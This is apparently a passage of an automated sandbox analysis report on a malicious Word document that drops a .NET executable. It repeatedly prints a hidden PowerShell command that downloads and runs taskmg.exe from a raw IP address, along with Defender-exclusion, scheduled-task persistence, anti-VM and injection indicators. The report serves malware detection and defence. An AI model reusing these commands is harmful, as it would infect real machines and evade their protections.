Source: C:\Users\user\AppData\Roaming\taskmg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
Source: C:\Users\user\AppData\Roaming\taskmg.exe | Process created: C:\Users\user\AppData\Roaming\taskmg.exe C:\Users\user\AppData\Roaming\taskmg.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Source: C:\Users\user\AppData\Roaming\taskmg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\taskmg.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\taskmg.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD613.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Mutant created: \Sessions\1\BaseNamedObjects\CVJFnsnVFoXysEkzODvWP
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: 14.0.taskmg.exe.400000.13.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.0.taskmg.exe.400000.9.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 14.2.taskmg.exe.400000.0.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBBX? source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdbV> source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.418905184.00000000027A4000.00000004.00000040.sdmp
                    Source: ~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

                    Data Obfuscation:

                    .NET source code contains potential unpacker
                    Source: taskmg[1].exe.0.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: taskmg.exe.3.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: gZfDBpJYZ.exe.9.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 9.0.taskmg.exe.12d0000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 9.2.taskmg.exe.12d0000.1.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Suspicious powershell command line found
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 9_2_002B12BB push esp; retn 001Ch
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 9_2_002B3654 push esp; retn 001Ch
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00C4FDE5 push ebp; ret
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00C4FD95 push ebp; ret
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Code function: 14_2_00C4FD46 push ebp; ret
                    Source: initial sample | Static PE information: section name: .text entropy: 7.79660930856

                    Persistence and Installation Behavior:

                    Tries to download and execute files (via powershell)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | File created: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\taskmg.exe

                    Boot Survival:

                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

                    Yara detected AntiVM3
                    Source: Yara match File source: 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: taskmg.exe PID: 1156, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: taskmg.exe, 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: taskmg.exe, 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344 Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 2860 Thread sleep time: -30027s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 1684 Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 572 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2940 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 1308 Thread sleep time: -360000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 2024 Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 2024 Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWindow / User API: threadDelayed 645
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWindow / User API: threadDelayed 9120
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 30027
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 30000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: vmware
                    Source: taskmg.exe, 00000009.00000002.445135938.000000000058E000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                    Source: taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Memory written: C:\Users\user\AppData\Roaming\taskmg.exe base: 400000 value starts with: 4D5A
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Injects files into Windows application
                    Source: C:\Windows\System32\notepad.exe | Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Bypasses PowerShell execution policy
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\taskmg.exe "C:\Users\user\AppData\Roaming\taskmg.exe"
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe | Process created: C:\Users\user\AppData\Roaming\taskmg.exe C:\Users\user\AppData\Roaming\taskmg.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
